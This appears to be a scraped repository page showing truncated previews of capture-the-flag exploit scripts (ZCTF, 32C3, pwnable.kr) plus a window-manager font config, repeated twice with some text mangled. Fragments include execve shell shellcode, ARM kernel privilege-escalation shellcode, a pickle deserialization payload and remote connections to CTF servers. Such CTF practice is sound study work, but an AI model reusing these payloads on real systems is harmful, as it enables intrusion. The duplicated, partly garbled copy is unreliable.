Cubarco cubarco

## config
#.......
# font
#.......

#font -*-cure-medium-*-*-*-11-*-*-*-*-*-*-*
font pango:snap, Tamsyn, WenQuanYi Bitmap Song, FontAwesome, Unifont 8

#..........
# windows
#..........

## zctf-note3.py
#!/usr/bin/env python
# coding=utf8

from pwn import p64, u64, process, ELF

elf = ELF('/lib64/libc.so.6')
# elf = ELF('./libc-2.19.so')
p = process('./note3')

free_got = 0x602018

## zctf-note2.py
#!/usr/bin/env python
# coding=utf8

from pwn import process, ELF, p64
from struct import unpack

# elf = ELF('./libc-2.19.so')
elf = ELF('/lib64/libc.so.6')
p = process('./note2')

## zctf-note1.py
#!/usr/bin/env python
# coding=utf8

from pwn import p64, ELF, process, remote
from struct import unpack
from time import sleep

# p = process('./note1')
p = remote('115.28.27.103', 9001)
elf = ELF('./libc-2.19.so')

## zctf-guess.py
#!/usr/bin/env python
# coding=utf8

from pwn import p64, remote

p = remote('115.28.27.103', 22222)

flag_addr = 0x6010c0

p.sendline('ZCTF{' + '\x01'*29 + '\x00'*262 + p64(flag_addr+5))

## 32c3ctf-teufel-exp.py
#!/usr/bin/env python
# coding=utf8

from pwn import p64, remote
from time import sleep
from struct import unpack

main_without_push_addr = 0x4004ee

p = remote('136.243.194.41', 666)

## 32c3ctf-gurke.py
#!/usr/bin/env python
# coding=utf8

import urllib2
import pickle


class Payload(object):
    def __reduce__(self):
        comm = "sys.stderr.write(__import__('__main__').flag.flag)"

## pwnable-hackerssecret-unexploitable-rop.py
#!/usr/bin/env python
# coding=utf8

from pwn import p64, process, ELF
from time import sleep

EXECUTABLE = '/home/unexploitable/unexploitable'

elf = ELF(EXECUTABLE)

## pwnable-rookiss-note.py
#!/usr/bin/env python
# coding=utf8

from pwn import p32, process, remote

# p = process('./note')
p = remote('0', 9019)
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90'

print '[*] Receiving welcome message...'

## 1-pwnable-rookiss-syscall.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char cred[] = "\x04\xe0\x2d\xe5\x00\x00\xa0\xe3\x40\x30\x9f\xe5\x33\xff\x2f\xe1\x04\x00\x2d\xe5\x01\x10\x41\xe0\x04\x00\x80\xe2\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x00\x9d\xe4\x0c\x30\x9f\xe5\x33\xff\x2f\xe1\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x4c\xf4\x03\x80\x6c\xf5\x03\x80";
char waa[] = "\x01\x30\xd0\xe4\x01\x30\xc1\xe4\x01\x20\x52\xe2\xfb\xff\xff\xaa\x1e\xff\x2f\xe1";

char addr1[] = "\xfe\xca\xf5\x83";
char addr2[] = "\xee\xbe\xf6\x83";
	#.......
	# font
	#.......

	#font --cure-medium----11-------*
	font pango:snap, Tamsyn, WenQuanYi Bitmap Song, FontAwesome, Unifont 8

	#..........
	# windows
	#..........
	#!/usr/bin/env python
	# coding=utf8

	from pwn import p64, u64, process, ELF

	elf = ELF('/lib64/libc.so.6')
	# elf = ELF('./libc-2.19.so')
	p = process('./note3')

	free_got = 0x602018
	#!/usr/bin/env python
	# coding=utf8

	from pwn import process, ELF, p64
	from struct import unpack

	# elf = ELF('./libc-2.19.so')
	elf = ELF('/lib64/libc.so.6')
	p = process('./note2')
	#!/usr/bin/env python
	# coding=utf8

	from pwn import p64, ELF, process, remote
	from struct import unpack
	from time import sleep

	# p = process('./note1')
	p = remote('115.28.27.103', 9001)
	elf = ELF('./libc-2.19.so')
	#!/usr/bin/env python
	# coding=utf8

	from pwn import p64, remote

	p = remote('115.28.27.103', 22222)

	flag_addr = 0x6010c0

	p.sendline('ZCTF{' + '\x01'29 + '\x00'262 + p64(flag_addr+5))
	#!/usr/bin/env python
	# coding=utf8

	import urllib2
	import pickle


	class Payload(object):
	def __reduce__(self):
	comm = "sys.stderr.write(__import__('__main__').flag.flag)"
	#!/usr/bin/env python
	# coding=utf8

	from pwn import p64, process, ELF
	from time import sleep

	EXECUTABLE = '/home/unexploitable/unexploitable'

	elf = ELF(EXECUTABLE)
	#!/usr/bin/env python
	# coding=utf8

	from pwn import p32, process, remote

	# p = process('./note')
	p = remote('0', 9019)
	shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90'

	print '[*] Receiving welcome message...'
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>

	char cred[] = "\x04\xe0\x2d\xe5\x00\x00\xa0\xe3\x40\x30\x9f\xe5\x33\xff\x2f\xe1\x04\x00\x2d\xe5\x01\x10\x41\xe0\x04\x00\x80\xe2\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x00\x9d\xe4\x0c\x30\x9f\xe5\x33\xff\x2f\xe1\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x4c\xf4\x03\x80\x6c\xf5\x03\x80";
	char waa[] = "\x01\x30\xd0\xe4\x01\x30\xc1\xe4\x01\x20\x52\xe2\xfb\xff\xff\xaa\x1e\xff\x2f\xe1";

	char addr1[] = "\xfe\xca\xf5\x83";
	char addr2[] = "\xee\xbe\xf6\x83";